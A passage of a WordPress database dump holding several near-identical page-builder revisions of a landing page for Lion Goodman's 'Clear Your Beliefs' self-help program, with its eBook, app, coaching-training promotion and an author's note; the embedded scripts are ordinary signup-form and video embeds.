box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:22px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1209, 1686, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:647:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -38px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:22px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1210, 1687, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -100px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:657px; height:370px; padding-top: 8px; margin-top: 118px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="657" height="370" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:647:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -30px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:28px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:944:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 8px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:657:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg"></div>\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
